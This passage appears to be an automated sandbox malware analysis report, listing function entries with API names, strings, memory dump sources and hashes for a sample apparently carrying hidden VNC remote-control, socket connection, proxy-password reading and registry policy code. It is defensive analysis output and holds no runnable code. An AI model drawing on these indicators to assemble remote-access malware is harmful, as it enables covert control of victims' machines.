                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$Time$CloseDesktop$BuffersCountCriticalDeleteFlushHandleInputLeaveOpenSectionSystemTick
                                                                            • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                            • API String ID: 744660428-3977938048
                                                                            • Opcode ID: fed645862cd38dbadc558167132c5494320c5b0844e94726f2647533ca8cab21
                                                                            • Instruction ID: ed41703a626b3b70477de1e408876c62e672952b70244af7c8d6eb1f6ff1ff59
                                                                            • Opcode Fuzzy Hash: fed645862cd38dbadc558167132c5494320c5b0844e94726f2647533ca8cab21
                                                                            • Instruction Fuzzy Hash: 82D16E22A086C1C5EB618F25C4587FE7BA1EB86B8DF194171CE8C8B7A5CFB9E445C700
                                                                            Function 00007FF6C2BA69D5 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 224COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$DesktopLeave$CloseCountEnterInputOpenRevertSelfTickTimetime
                                                                            • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                            • API String ID: 2523754900-3977938048
                                                                            • Opcode ID: f00f46bdec5dcfd195635017d4a5b0b55a3711d86be45cf4a2b3171601dbe6f0
                                                                            • Instruction ID: 7774d28ebaa6a0c6e9f01d095ba868049f57f6dc8f6a8e7e78ca9b0e3491786e
                                                                            • Opcode Fuzzy Hash: f00f46bdec5dcfd195635017d4a5b0b55a3711d86be45cf4a2b3171601dbe6f0
                                                                            • Instruction Fuzzy Hash: 3DB19E22A0868185F794CF25C4587BE7BB1EB86B8EF194132DE8C877A5CFB9D445C740
                                                                            Function 00007FF6C2BA6C6A Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 213COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$Time$CloseDesktop$BuffersCountCriticalDeleteFlushHandleInputLeaveOpenSectionSystemTick
                                                                            • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                            • API String ID: 744660428-3977938048
                                                                            • Opcode ID: f694d75a88e5963e6137a3996feb78d47f16a8ecee7cd7818c657bba8c0c73e0
                                                                            • Instruction ID: d5bfadd0930d955987542897d4bb8aa00f933aa755b92dee4e7414b28e2f77eb
                                                                            • Opcode Fuzzy Hash: f694d75a88e5963e6137a3996feb78d47f16a8ecee7cd7818c657bba8c0c73e0
                                                                            • Instruction Fuzzy Hash: A4B17F22A0868185F790DF25C4587BE7BB1EB86B8EF594032CE8D877A5CFB9E445C740
                                                                            Function 00007FF6C2B8B8C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 110networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: inet_addr$connectgethostbynamehtonssocket
                                                                            • String ID: 0123456789.
                                                                            • API String ID: 478842821-2088042752
                                                                            • Opcode ID: 263abe01daf5a009ada5feb1aef2725500a51be732e0e04e7777c9ecb3499f38
                                                                            • Instruction ID: e0d6d61c438d2e2093e91c1132fc78b9b5e6738559014e6f1ad9a00c4a2cdc54
                                                                            • Opcode Fuzzy Hash: 263abe01daf5a009ada5feb1aef2725500a51be732e0e04e7777c9ecb3499f38
                                                                            • Instruction Fuzzy Hash: 60418062A0865281EA649F22D44007973B0FF88FAEF445232EECD87794EF7CE441C750
                                                                            Function 00007FF6C2BB5AE0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 108COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Rect$ClassCombineCreateDeleteNameObjectWindowfree
                                                                            • String ID: ConsoleWindowClass$tty
                                                                            • API String ID: 490048385-1921057836
                                                                            • Opcode ID: 298372f63dd054519ce3cc4dd935d2ab84d827bdd727a36e9ad3e0d359236f91
                                                                            • Instruction ID: 8e6294a083c9a54c9518c0a5719088e04f28be7238783ff6340d5603bb69750f
                                                                            • Opcode Fuzzy Hash: 298372f63dd054519ce3cc4dd935d2ab84d827bdd727a36e9ad3e0d359236f91
                                                                            • Instruction Fuzzy Hash: 39417036708B8586D760CF26E5846A9B7A1FB89B89F444035DF8E83B54DFBCE545CB00
                                                                            Function 00007FF6C2B8B460 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _wgetenv$_errno_invalid_parameter_noinfo
                                                                            • String ID: CONNECT_PASSWORD$HTTP_PROXY_PASSWORD$SOCKS5_PASSWD$SOCKS5_PASSWORD
                                                                            • API String ID: 1184729097-3964388033
                                                                            • Opcode ID: 75c89c269b5bdbccb324d11e52bf46f8eda89c740f1d11fad698b593103782f0
                                                                            • Instruction ID: d7dbbe92e648556512c956f01e82a69b996ee0b685c4d327da687c7a0cf1cc25
                                                                            • Opcode Fuzzy Hash: 75c89c269b5bdbccb324d11e52bf46f8eda89c740f1d11fad698b593103782f0
                                                                            • Instruction Fuzzy Hash: 89218C22A1A64340FD95DF25D5912F452E0AF6974EF4C483ADE8DC63A2FEACF855C240
                                                                            Function 00007FF6C2BB3523 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58timethreadclipboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ChainChangeClipboardCurrentKillThreadTimer
                                                                            • String ID: vncdesktopsink.cpp : Unsethooks Failed$vncdesktopsink.cpp : Unsethooks OK$vncdesktopsink.cpp : WM_DESTROY$vncdesktopsink.cpp : unset SC hooks OK$vncdesktopsink.cpp : unset W8 hooks OK
                                                                            • API String ID: 3622578367-539335655
                                                                            • Opcode ID: 4ff98f2526b40473347ec64f61ad6471bc2d7702336f109aa2423c9ffd723b96
                                                                            • Instruction ID: c9cae0da6ad7371eedb29e9a9de03b92ca0553e7c1d6f241f6acd963c5e0f851
                                                                            • Opcode Fuzzy Hash: 4ff98f2526b40473347ec64f61ad6471bc2d7702336f109aa2423c9ffd723b96
                                                                            • Instruction Fuzzy Hash: 25212C66B0858292F79C9F64D9841F963A5BF4570EF884433CF9EC2291DFBCA565C200
                                                                            Function 00007FF6C2B93BE0 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 40registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close$CreateOpenValue
                                                                            • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies$SoftwareSASGeneration$System
                                                                            • API String ID: 678895439-3579764778
                                                                            • Opcode ID: d324a7fd9c053fdbed078a6d8dbfb6b791194126c2f4355e782ae63509712a99
                                                                            • Instruction ID: 045171830068f774ea52174311988b2c3e6284fafb6b8c738a4604e0f5edda5b
                                                                            • Opcode Fuzzy Hash: d324a7fd9c053fdbed078a6d8dbfb6b791194126c2f4355e782ae63509712a99
                                                                            • Instruction Fuzzy Hash: 08110871A18A5286EB508F25F88466A77B4FB84789F401131EBCD83B68DF7CD159CB40
                                                                            Function 00007FF6C2B93CB0 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 34registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close$CreateDeleteOpenValue
                                                                            • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies$SoftwareSASGeneration$System
                                                                            • API String ID: 2881815620-3579764778
                                                                            • Opcode ID: e69ca6185ab1a7843b6bf4ee7a75db947d055aaacf23707991ad0b828e0a2439
                                                                            • Instruction ID: 03e00c321c9bbada78326a1506ebda237c836625599ae51334484d050ab699a5
                                                                            • Opcode Fuzzy Hash: e69ca6185ab1a7843b6bf4ee7a75db947d055aaacf23707991ad0b828e0a2439
                                                                            • Instruction Fuzzy Hash: 01012A31A18B4282EB909F25F89456A77B4FB84789F401131EBCD83B68DF7CD159CB40
                                                                            Function 00007FF6C2C39ABC Relevance: 13.6, APIs: 9, Instructions: 142COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno$_invalid_parameter_noinfofreemalloc
                                                                            • String ID:
                                                                            • API String ID: 3646291181-0
                                                                            • Opcode ID: 11c538c35a46a4fb5c0c73f141e54ae4a02d4c26eb65e23d1f675c1fad1344f9
                                                                            • Instruction ID: b1b28107a32934fc3c8beee5a8193732e83d9711bffac76284b6530641d64bf1
                                                                            • Opcode Fuzzy Hash: 11c538c35a46a4fb5c0c73f141e54ae4a02d4c26eb65e23d1f675c1fad1344f9
                                                                            • Instruction Fuzzy Hash: 14518022A086828AF7A0DF25D5403E926B0FB457ADF544A31EF9E877C6DFBCE4418711
                                                                            Function 00007FF6C2C44BE4 Relevance: 13.6, APIs: 9, Instructions: 87COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno$_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 2819658684-0
                                                                            • Opcode ID: d011579407d24bdfbb9aadfd6c0a3b9405857a9de314b67aa1550ae6c8c7f008
                                                                            • Instruction ID: 39a798edb46cceaaeee554e11e1812dc4959e99d5552455a6a505e1099b461cb
                                                                            • Opcode Fuzzy Hash: d011579407d24bdfbb9aadfd6c0a3b9405857a9de314b67aa1550ae6c8c7f008
                                                                            • Instruction Fuzzy Hash: 27316E25908B5284EAB09F5195001BE62B0BF59BAAF644A32EFDCC37D6DEECE500C310
                                                                            Function 00007FF6C2B97AF0 Relevance: 13.5, APIs: 9, Instructions: 36fileCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$FileUnmapView$CriticalDeleteSection
                                                                            • String ID:
                                                                            • API String ID: 4242051881-0
                                                                            • Opcode ID: 22161c178d6bb14c1052406e1d71c9eb4b4dcb4edfbb29f5cd716a860c71812c
                                                                            • Instruction ID: 16bdad5bccdb16e5c43300660909ba05c57d10f0871f11e1f47fe74f0b05833f
                                                                            • Opcode Fuzzy Hash: 22161c178d6bb14c1052406e1d71c9eb4b4dcb4edfbb29f5cd716a860c71812c
                                                                            • Instruction Fuzzy Hash: 5311A825A0AA0685EF84DF62E9A41783774FF95F4EB140472CF8E82364CF6CD459E380
                                                                            Function 00007FF6C2BA4CDB Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 232COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
